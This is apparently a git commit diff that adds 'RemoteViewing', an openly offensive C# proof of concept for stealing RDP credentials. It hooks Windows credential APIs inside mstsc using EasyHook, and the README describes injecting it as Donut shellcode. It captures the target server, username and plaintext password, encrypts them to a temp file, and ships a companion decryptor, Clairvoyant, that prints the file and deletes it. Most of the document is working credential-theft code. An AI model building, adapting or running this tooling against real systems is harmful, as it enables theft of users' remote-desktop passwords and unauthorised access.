+RemoteViewing

README.md

@@ -338,6 +338,10 @@ Called ==> SystemProcessInformation
 [...Snipped...]
 ```
 
+### RemoteViewing
+
+RemoteViewing, is quick POC to demo RDP credential theft through API hooking using [EasyHook](https://easyhook.github.io/) for .Net payloads combined with [Costura](https://github.com/Fody/Costura) to pack resources into a single module. This is adapted from a post by [@0x09AL] (https://twitter.com/0x09AL) that you can read [here] (https://www.mdsec.co.uk/2019/11/rdpthief-extracting-clear-text-credentials-from-remote-desktop-clients/). To use this you have to compile RemoteViewing and then turn it into shellcode with [Donut](https://github.com/TheWover/donut) after which you have to inject that shellcode into mstsc. RemoteViewing will RC2 encrypt any credentials it captures and write them to disk. You can then use Clairvoyant to decrypt the file in memory, read out the results and delete the file.
+
 ## Windows API
 
 ### SystemProcessAndThreadsInformation

RemoteViewing/Clairvoyant/Clairvoyant.csproj

@@ -0,0 +1,46 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
+  <PropertyGroup>
+    <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+    <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+    <ProjectGuid>{A5F883CE-1F96-4456-BB35-40229191420C}</ProjectGuid>
+    <OutputType>Exe</OutputType>
+    <RootNamespace>Clairvoyant</RootNamespace>
+    <AssemblyName>Clairvoyant</AssemblyName>
+    <TargetFrameworkVersion>v3.5</TargetFrameworkVersion>
+    <FileAlignment>512</FileAlignment>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugSymbols>true</DebugSymbols>
+    <DebugType>full</DebugType>
+    <Optimize>false</Optimize>
+    <OutputPath>bin\Debug\</OutputPath>
+    <DefineConstants>DEBUG;TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+    <PlatformTarget>AnyCPU</PlatformTarget>
+    <DebugType>pdbonly</DebugType>
+    <Optimize>true</Optimize>
+    <OutputPath>bin\Release\</OutputPath>
+    <DefineConstants>TRACE</DefineConstants>
+    <ErrorReport>prompt</ErrorReport>
+    <WarningLevel>4</WarningLevel>
+  </PropertyGroup>
+  <ItemGroup>
+    <Reference Include="System" />
+    <Reference Include="System.Core" />
+    <Reference Include="System.Xml.Linq" />
+    <Reference Include="System.Data.DataSetExtensions" />
+    <Reference Include="System.Data" />
+    <Reference Include="System.Xml" />
+  </ItemGroup>
+  <ItemGroup>
+    <Compile Include="Program.cs" />
+    <Compile Include="Properties\AssemblyInfo.cs" />
+  </ItemGroup>
+  <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
+</Project>

RemoteViewing/Clairvoyant/Clairvoyant.sln

@@ -0,0 +1,25 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 15
+VisualStudioVersion = 15.0.27703.2035
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Clairvoyant", "Clairvoyant.csproj", "{A5F883CE-1F96-4456-BB35-40229191420C}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Any CPU = Debug|Any CPU
+		Release|Any CPU = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{A5F883CE-1F96-4456-BB35-40229191420C}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{A5F883CE-1F96-4456-BB35-40229191420C}.Debug|Any CPU.Build.0 = Debug|Any CPU
+		{A5F883CE-1F96-4456-BB35-40229191420C}.Release|Any CPU.ActiveCfg = Release|Any CPU
+		{A5F883CE-1F96-4456-BB35-40229191420C}.Release|Any CPU.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {74F69AC6-B619-4FFC-BD52-5AC1946C69C2}
+	EndGlobalSection
+EndGlobal

RemoteViewing/Clairvoyant/Program.cs

@@ -0,0 +1,39 @@
+using System;
+using System.IO;
+using System.Security.Cryptography;
+
+namespace Clairvoyant
+{
+    class Program
+    {
+        // Generate file path
+        public static String GetOutputFilePath()
+        {
+            String sTempPath = Path.GetTempPath();
+            return sTempPath + "_wasRDP36D7.tmp";
+        }
+
+        // Key material
+        public static byte[] Key = { 0x00, 0x11, 0x22, 0x33, 0xaa, 0xbb, 0xcc, 0xdd, 0x44, 0x55, 0x66, 0x77 };
+        public static byte[] IV = { 0x0a, 0x1b, 0x2c, 0x3d, 0xf9, 0xe8, 0xd7, 0xc6 };
+
+        public static String DecryptTextFromFile(String FileName, byte[] Key, byte[] IV)
+        {
+            FileStream fStream = File.Open(FileName, FileMode.OpenOrCreate);
+            RC2 RC2alg = RC2.Create();
+            CryptoStream cStream = new CryptoStream(fStream, RC2alg.CreateDecryptor(Key, IV), CryptoStreamMode.Read);
+            StreamReader sReader = new StreamReader(cStream);
+            string val = sReader.ReadToEnd();
+            sReader.Close();
+            cStream.Close();
+            fStream.Close();
+            return val;
+        }
+
+        static void Main(string[] args)
+        {
+            Console.WriteLine(DecryptTextFromFile(GetOutputFilePath(), Key, IV));
+            File.Delete(GetOutputFilePath());
+        }
+    }
+}

RemoteViewing/Clairvoyant/Properties/AssemblyInfo.cs

@@ -0,0 +1,36 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("Clairvoyant")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyProduct("Clairvoyant")]
+[assembly: AssemblyCopyright("Copyright ©  2019")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible
+// to COM components.  If you need to access a type in this assembly from
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+[assembly: Guid("a5f883ce-1f96-4456-bb35-40229191420c")]
+
+// Version information for an assembly consists of the following four values:
+//
+//      Major Version
+//      Minor Version
+//      Build Number
+//      Revision
+//
+// You can specify all the values or you can default the Build and Revision Numbers
+// by using the '*' as shown below:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]

RemoteViewing/RemoteViewing/API.cs

@@ -0,0 +1,53 @@
+using System;
+using System.Runtime.InteropServices;
+
+namespace RemoteViewing
+{
+    class API
+    {
+        // Native API's
+        //-------------------------------------
+        [DllImport("SspiCli.dll")]
+        public static extern UInt32 SspiPrepareForCredRead(
+            IntPtr AuthIdentity,
+            IntPtr pszTargetName,
+            IntPtr pCredmanCredentialType,
+            IntPtr ppszCredmanTargetName);
+
+        [DllImport("Credui.dll")]
+        public static extern Boolean CredUnPackAuthenticationBufferW(
+            UInt32 dwFlags,
+            IntPtr pAuthBuffer,
+            UInt32 cbAuthBuffer,
+            IntPtr pszUserName,
+            IntPtr pcchMaxUserName,
+            IntPtr pszDomainName,
+            IntPtr pcchMaxDomainName,
+            IntPtr pszPassword,
+            IntPtr pcchMaxPassword);
+
+        // Delegates
+        //-------------------------------------
+        public struct DELEGATES
+        {
+            [UnmanagedFunctionPointer(CallingConvention.StdCall)]
+            public delegate UInt32 SspiPrepareForCredRead(
+                IntPtr AuthIdentity,
+                IntPtr pszTargetName,
+                IntPtr pCredmanCredentialType,
+                IntPtr ppszCredmanTargetName);
+
+            [UnmanagedFunctionPointer(CallingConvention.StdCall)]
+            public delegate Boolean CredUnPackAuthenticationBufferW(
+                UInt32 dwFlags,
+                IntPtr pAuthBuffer,
+                UInt32 cbAuthBuffer,
+                IntPtr pszUserName,
+                IntPtr pcchMaxUserName,
+                IntPtr pszDomainName,
+                IntPtr pcchMaxDomainName,
+                IntPtr pszPassword,
+                IntPtr pcchMaxPassword);
+        }
+    }
+}

RemoteViewing/RemoteViewing/FodyWeavers.xml

@@ -0,0 +1,14 @@
+<?xml version="1.0" encoding="utf-8" ?>
+<Weavers>
+	<Costura>
+		<IncludeAssemblies>
+			EasyHook
+		</IncludeAssemblies>
+		<Unmanaged32Assemblies>
+			EasyHook32
+		</Unmanaged32Assemblies>
+		<Unmanaged64Assemblies>
+			EasyHook64
+		</Unmanaged64Assemblies>
+</Costura>
+</Weavers>

RemoteViewing/RemoteViewing/Handler.cs

@@ -0,0 +1,33 @@
+using System;
+using System.IO;
+using System.Security.Cryptography;
+
+namespace RemoteViewing
+{
+    class Handler
+    {
+        // Generate file path
+        public static String GetOutputFilePath()
+        {
+            String sTempPath = Path.GetTempPath();
+            return sTempPath + "_wasRDP36D7.tmp";
+        }
+
+        // Key material
+        public static byte[] Key = { 0x00, 0x11, 0x22, 0x33, 0xaa, 0xbb, 0xcc, 0xdd, 0x44, 0x55, 0x66, 0x77 };
+        public static byte[] IV = { 0x0a, 0x1b, 0x2c, 0x3d, 0xf9, 0xe8, 0xd7, 0xc6 };
+
+        // RC2 encrypt data
+        public static void EncryptTextToFile(String Data, String FileName, byte[] Key, byte[] IV)
+        {
+            FileStream fStream = File.Open(FileName, FileMode.OpenOrCreate);
+            RC2 RC2alg = RC2.Create();
+            CryptoStream cStream = new CryptoStream(fStream, RC2alg.CreateEncryptor(Key, IV), CryptoStreamMode.Write);
+            StreamWriter sWriter = new StreamWriter(cStream);
+            sWriter.WriteLine(Data);
+            sWriter.Close();
+            cStream.Close();
+            fStream.Close();
+        }
+    }
+}

RemoteViewing/RemoteViewing/Program.cs

@@ -0,0 +1,72 @@
+using System;
+using System.Runtime.InteropServices;
+
+namespace RemoteViewing
+{
+    class Program
+    {
+        // Globals
+        //================================
+        static String sTargetHost = String.Empty;
+
+        // Hooks
+        //================================
+        public static void SspiPrepareForCredReadHook()
+        {
+            var hook = EasyHook.LocalHook.Create(
+                EasyHook.LocalHook.GetProcAddress("SspiCli.dll", "SspiPrepareForCredRead"),
+                new API.DELEGATES.SspiPrepareForCredRead(SspiPrepareForCredReadDetour),
+                null);
+
+            hook.ThreadACL.SetExclusiveACL(new int[] { 0 }); // Hook all threads except our thread
+        }
+
+        public static void CredUnPackAuthenticationBufferWHook()
+        {
+            var hook = EasyHook.LocalHook.Create(
+                EasyHook.LocalHook.GetProcAddress("Credui.dll", "CredUnPackAuthenticationBufferW"),
+                new API.DELEGATES.CredUnPackAuthenticationBufferW(CredUnPackAuthenticationBufferWDetour),
+                null);
+
+            hook.ThreadACL.SetExclusiveACL(new int[] { 0 }); // Hook all threads except our thread
+        }
+
+        // Function detours
+        //================================
+        static private UInt32 SspiPrepareForCredReadDetour(IntPtr AuthIdentity, IntPtr pszTargetName, IntPtr pCredmanCredentialType, IntPtr ppszCredmanTargetName)
+        {
+            // Store server string for later reference
+            sTargetHost = Marshal.PtrToStringUni(pszTargetName);
+            return API.SspiPrepareForCredRead(AuthIdentity, pszTargetName, pCredmanCredentialType, ppszCredmanTargetName);
+        }
+
+        static private Boolean CredUnPackAuthenticationBufferWDetour(UInt32 dwFlags, IntPtr pAuthBuffer, UInt32 cbAuthBuffer, IntPtr pszUserName, IntPtr pcchMaxUserName, IntPtr pszDomainName, IntPtr pcchMaxDomainName, IntPtr pszPassword, IntPtr pcchMaxPassword)
+        {
+            // Call Credui!CredUnPackAuthenticationBufferW
+            Boolean CallRes = API.CredUnPackAuthenticationBufferW(dwFlags, pAuthBuffer, cbAuthBuffer, pszUserName, pcchMaxUserName, pszDomainName, pcchMaxDomainName, pszPassword, pcchMaxPassword);
+
+            // Read API pointer data
+            String sUser = Marshal.PtrToStringUni(pszUserName);
+            String sPass = Marshal.PtrToStringUni(pszPassword);
+
+            // Create result string
+            String RemoteView = "//----------------\n" +
+                                "// Server : " + sTargetHost + "\n" +
+                                "// User   : " + sUser + "\n" +
+                                "// Pass   : " + sPass + "\n" +
+                                "//----------------\n";
+
+            // Encrypt and write to disk
+            Handler.EncryptTextToFile(RemoteView, Handler.GetOutputFilePath(), Handler.Key, Handler.IV);
+
+            return CallRes;
+        }
+
+        static void Main(string[] args)
+        {
+            // Install hooks
+            SspiPrepareForCredReadHook();
+            CredUnPackAuthenticationBufferWHook();
+        }
+    }
+}

RemoteViewing/RemoteViewing/Properties/AssemblyInfo.cs

@@ -0,0 +1,36 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("RemoteViewing")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyProduct("RemoteViewing")]
+[assembly: AssemblyCopyright("Copyright ©  2019")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible
+// to COM components.  If you need to access a type in this assembly from
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+[assembly: Guid("28978103-d90d-4618-b22e-222727f40313")]
+
+// Version information for an assembly consists of the following four values:
+//
+//      Major Version
+//      Minor Version
+//      Build Number
+//      Revision
+//
+// You can specify all the values or you can default the Build and Revision Numbers
+// by using the '*' as shown below:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]